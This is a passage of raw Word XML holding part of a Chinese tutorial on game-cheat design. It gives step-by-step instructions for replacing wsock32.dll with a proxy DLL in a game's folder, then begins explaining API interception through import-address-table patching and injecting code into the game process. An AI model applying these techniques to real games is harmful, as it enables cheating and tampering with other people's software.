        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>closesocket @7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">connect @8 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其它输出函数声明代码略。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、从“工程”菜单中选择“设置”，弹出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Project Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对话框，选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签，在“对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库模块”中输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ws2_32.lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(6)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、编译项目，产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wsock32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、将系统目录下原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wsock32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库文件拷贝到被外挂程序的目录下，并将其改名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wsock.001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；再将上面产生的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wsock32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件同样拷贝到被外挂程序的目录下。重新启动游戏程序，此时游戏程序将先加载我们自己制作的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wsock32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，再通过该库文件间接调用原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口函数来实现访问网络。上面我们仅仅介绍了挡载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的实现过程，至于如何加入外挂控制代码，还需要外挂开发人员对游戏数据包结构、内容、加密算法等方面的仔细分析（这个过程将是一个艰辛的过程），再生成外挂控制代码。关于数据包分析方法和技巧，不是本文讲解的范围，如您感兴趣可以到网上查查相关资料。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g*oodmorning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集整理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏外挂设计技术探讨③</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术与挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术在原理上很相似，但是前者比后者提供了更强大的功能。挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅只能挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口函数，而挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以实现对应用程序调用的包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数在内的所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的挡截。如果您的外挂程序仅打算对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的函数进行挡截的话，您可以只选择使用上小节介绍的挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>技术。随着大量外挂程序在功能上的扩展，它们不仅仅只提供对数据包的挡截，而且还对游戏程序中使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库函数的挡截，以使外挂的功能更加强大。例如，可以通过挡截相关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数以实现对非中文游戏的汉化功能，有了这个利器，可以使您的外挂程序无所不能了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术的原理核心也是使用我们自己的函数来替换掉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库提供的函数，有点同挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理相似吧。但是，其实现过程却比挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要复杂的多，如像实现挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Winsock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程一样，将应用程序调用的所有的库文件都写一个模拟库有点不大可能，就只说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就有上千个，还有很多库提供的函数结构并未公开，所以写一个模拟库代替的方式不大现实，故我们必须另谋良方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最终目标是使用自定义的函数代替原函数。那么，我们首先应该知道应用程序何时、何地、用何种方式调用原函数。接下来，需要将应用程序中调用该原函数的指令代码进行修改，使它将调用函数的指针指向我们自己定义的函数地址。这样，外挂程序才能完全控制应用程序调用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，至于在其中如何加入外挂代码，就应需求而异了。最后还有一个重要的问题要解决，如何将我们自定义的用来代替原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的函数代码注入被外挂游戏程序进行地址空间中，因在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中应用程序仅只能访问到本进程地址空间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>内的代码和数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　综上所述，要实现挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，至少需要解决如下三个问题：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　●</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何定位游戏程序中调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数指令代码？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　●</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何修改游戏程序中调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数指令代码？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　●</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何将外挂代码（自定义的替换函数代码）注入到游戏程序进程地址空间？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　下面我们逐一介绍这几个问题的解决方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、定位调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数指令代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　我们知道，在汇编语言中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令来调用函数或过程的，它是通过指令参数中的函数地址而定位到相应的函数代码的。那么，我们如果能寻找到程序代码中所有调用被挡截的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令的话，就可以将该指令中的函数地址参数修改为替代函数的地址。虽然这是一个可行的方案，但是实现起来会很繁琐，也不稳健。庆幸的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中所使用的可执行文件（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式）采用了输入地址表机制，将所有在程序调用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的地址信息存放在输入地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>址表中，而在程序代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令中使用的地址不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的地址，而是输入地址表中该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的地址项，如想使程序代码中调用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数被代替掉，只用将输入地址表中该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的地址项内容修改即可。具体理解输入地址表运行机制，还需要了解一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式文件结构，其中图三列出了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式文件的大致结构。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　图三：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式大致结构图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(003.jpg)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式文件一开始是一段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序，当你的程序在不支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的环境中运行时，它就会显示“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>This Program cannot be run in DOS mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”这样的警告语句，接着这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件头，就开始真正的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件内容了。首先是一段称为“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
